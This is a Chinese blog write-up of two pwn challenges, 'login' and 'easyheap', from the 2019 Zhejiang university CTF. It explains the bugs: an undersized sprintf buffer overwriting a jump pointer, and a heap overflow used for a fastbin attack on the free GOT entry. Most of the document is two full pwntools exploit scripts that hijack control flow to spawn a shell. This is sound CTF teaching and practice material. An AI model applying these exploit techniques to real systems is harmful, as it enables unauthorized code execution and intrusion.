avatar

目录
CTF-19年浙江省大学生网络安全大赛

CTF-19年浙江省大学生网络安全大赛

Pwn

0x1 login

这道题是用C++写的,有很多很长名字的函数,不过问题不大,经过ida分析,只需要输入以下数据,即可发生某地址跳转

Code
1
2
3
4
5
6
7
8
9
10
11
 _____   _  ____ _____ _____   _                _       
|__ / | |/ ___|_ _| ___| | | ___ __ _(_)_ __
/ /_ | | | | | | |_ | | / _ \ / _` | | '_ \
/ /| |_| | |___ | | | _| | |__| (_) | (_| | | | | |
/____\___/ \____| |_| |_| |_____\___/ \__, |_|_| |_|
|___/
Please enter username: admin
Please enter password: 2jctf_pa5sw0rd
Password accepted: Password accepted:

Segmentation fault (core dumped)

接着发现sprintf的长度没有足够大,可以覆盖到这个跳转指针,且程序本身就有system(“/bin/sh”)的backdoor,所以可以直接覆盖这个跳转指针为backdoor指针,即可拿到shell

Exp如下:

Code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
#!/usr/bin/python2.7  
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = "debug"
context.arch = "amd64"
elf = ELF("login")
sh = 0
lib = 0
def pwn(ip,port,debug):
global sh
global lib
if(debug == 1):
sh = process("./login")
lib = ELF("/lib/x86_64-linux-gnu/libc.so.6")
else:
sh = remote(ip,port)
lib = ELF("/lib/x86_64-linux-gnu/libc.so.6")
payload = "admin\x00"
sh.sendlineafter(":",payload)
sh.recvuntil(":")
payload = "2jctf_pa5sw0rd\x00"
payload += "aaaabaaac\x00aadaaaeaaafaaagaaahayyyyyyyyyyyyyyyyyyyyyyyyyyy" + p64(0x400E9E)
sh.sendline(payload)
sh.interactive()
if __name__ == "__main__":
pwn("127.0.0.1",9999,1)

0x2 easyheap

堆题先检查保护

Code
1
2
3
4
5
6
7
8
pig@ubuntu:$ checksec easyheap 
[*] '/home/pig/Pig/CTF/ShengSai/19.9.21/pwn/easyheap/easyheap'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
`

没有开PIE 且 没有GOT保护,先想到覆盖free_GOT

然后导入ida发现有明显的堆溢出,然后程序本身就存在system函数,所以直接覆盖free_GOT为system_PLT,然后free一个内容为/bin/sh的堆块即可执行system(“/bin/sh\x00”)

具体步骤如下

申请三个堆块,通过第二个堆块覆盖到第三个堆块实现fastbin attack攻击chunk_list,然后覆盖第一个堆块为free_GOT,然后通过edit功能修改free_GOT为system_PLT,同时第二个堆块的内容为/bin/sh\x00,free掉第二个堆块即可拿到shell

Exp如下:

Code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
#!/usr/bin/python2.7  
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = "debug"
context.arch = "amd64"
elf = ELF("easyheap")
sh = 0
lib = 0
def edit(idx,size,content):
sh.sendlineafter("Your choice :","2")
sh.sendlineafter(":",str(idx))
sh.sendlineafter(":",str(size))
sh.sendafter(":",content)
def add(size,content):
sh.sendlineafter("Your choice :","1")
sh.sendlineafter(":",str(size))
sh.sendlineafter(":",content)
def free(idx):
sh.sendlineafter("Your choice :","3")
sh.sendlineafter(":",str(idx))
def pwn(ip,port,debug):
global sh
global lib
if(debug == 1):
sh = process("./easyheap")
lib = ELF("/lib/x86_64-linux-gnu/libc.so.6")
else:
sh = remote(ip,port)
lib = ELF("/lib/x86_64-linux-gnu/libc.so.6")
add(0x68,'')
add(0x68,'')
add(0x68,'')
free(2)
payload = '/bin/sh\x00'
payload = payload.ljust(0x68,'a')
payload += p64(0x71) + p64(0x6020ad)
edit(1,0x200,payload)
add(0x68,'')
add(0x68,'')
payload = '\xaa' * 3 + p64(0) * 4 + p64(elf.got['free'])
edit(3,len(payload) + 0x100,payload)
edit(0,9,p64(elf.plt['system']))
free(1)
sh.interactive()
if __name__ == "__main__":
pwn("127.0.0.1",9999,1)
打赏
  • 微信
    微信
  • 支付宝
    支付宝

评论